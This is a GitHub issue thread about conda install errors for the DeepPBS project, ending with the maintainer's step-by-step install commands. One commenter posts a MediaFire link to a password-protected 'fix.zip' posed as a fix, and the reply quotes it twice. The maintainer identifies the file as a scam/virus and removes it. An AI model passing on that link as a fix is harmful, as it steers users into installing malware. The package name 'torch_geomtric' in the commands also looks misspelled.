### ISSUE TITLE
Install Error

### ISSUE THREAD

**Issue by Huang-XN** [timkartar/DeepPBS#4]
Hi,

I have errors while creating environment from `conda env create -f deeppbs_linux.yml`:

```
Channels:
 - pytorch-nightly
 - nvidia
 - salilab
 - defaults
 - conda-forge
Platform: linux-64
Collecting package metadata (repodata.json): done
Solving environment: failed

PackagesNotFoundError: The following packages are not available from current channels:

  - torchvision==0.18.0.dev20240228=py310_cu121
  - torchaudio==2.2.0.dev20240228=py310_cu121
  - pytorch==2.3.0.dev20240228=py3.10_cuda12.1_cudnn8.9.2_0

Current channels:

  - https://conda.anaconda.org/pytorch-nightly/linux-64
  - https://conda.anaconda.org/nvidia/linux-64
  - https://conda.anaconda.org/salilab/linux-64
  - https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/main/linux-64
  - https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/r/linux-64
  - https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/msys2/linux-64
  - https://mirrors.tuna.tsinghua.edu.cn/anaconda/cloud/conda-forge/linux-64

To search for alternate channels that may provide the conda package you're
looking for, navigate to

    https://anaconda.org

and use the search bar at the top of the page.

```

I am using Ubuntu 22.04.4 LTS.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Huang-XN** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."
Thanks
But does not work for me. It is .exe file for windows.

**Comment by Huang-XN** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Thanks
But does not work for me. It is .exe file for windows.

**Comment by timkartar** [comment]
Hi Huang. That other comment was a scam/virus. I removed it. Please don't download/use such files. I shall look at the yml issue and get back to you. In the meantime, have you tried installing those three packages separately? ( Pytorch 2.3.0-cuda12.1 , torchvision and torchaudio )

**Comment by Huang-XN** [comment]
OMG! I have downloaded it but removed. 

I have successfully installed it by installing them separately.

I hope you have a look at yml file. Because deeppbs in pip dependencies might have some problems.
In my environment, it reported that `ERROR: Could not find a version that satisfies the requirement deeppbs (from versions: none)
ERROR: No matching distribution found for deeppbs`

Thanks

**Comment by timkartar** [comment]
Hi Huang, I realize why. Please remove the `deeppbs=0.0.1` line from the yml file and it should resolve that. I am working on a fresh install file.

**Comment by timkartar** [comment]
Resolving the yml issues takes forever by conda. So, here's a step by step list of installation commands (you might need to adjust your pytorch and cuda version):
```
// gcc and cuda configs: gcc/12.3.0 cuda/12.2.1 (works with 12.2 and 12.1, just FYI)

conda create -n deeppbs_install python=3.10

conda init bash

conda activate deeppbs_install

// look here for other versions: https://pytorch.org/get-started/previous-versions/
conda install pytorch==2.3.0 torchvision==0.18.0 torchaudio==2.3.0 pytorch-cuda=12.1 -c pytorch -c nvidia

pip install torch_geomtric

// look here for other versions: https://pytorch-geometric.readthedocs.io/en/latest/notes/installation.html
pip install torch_scatter torch_sparse torch_cluster -f https://data.pyg.org/whl/torch-2.3.0+cu121.html

pip install -U --no-cache-dir     biopython==1.83     logomaker     matplotlib==3.5.2     networkx     pandas==1.4.4     pdb2pqr     scipy==1.14.1     seaborn==0.13.2     freesasa==2.2.1 

cd <path to DeepPBS>
pip install -e .

# test 
cd run/process
ls pdb/ > input.txt
./process_and_predict.sh
```

Let me know how things go with this.

**Comment by Huang-XN** [comment]
I have done. Everything is ok. Installation is complete.

Thanks a lot

**Comment by Huang-XN** [comment]
Sorry, I forgot to tell you. 

`pip install torch-geomtric` should be `pip install torch_geomtric`

**Comment by timkartar** [comment]
Glad to hear that. Thanks a lot ! I will update the repo readme with these instructions. Closing this issue now.
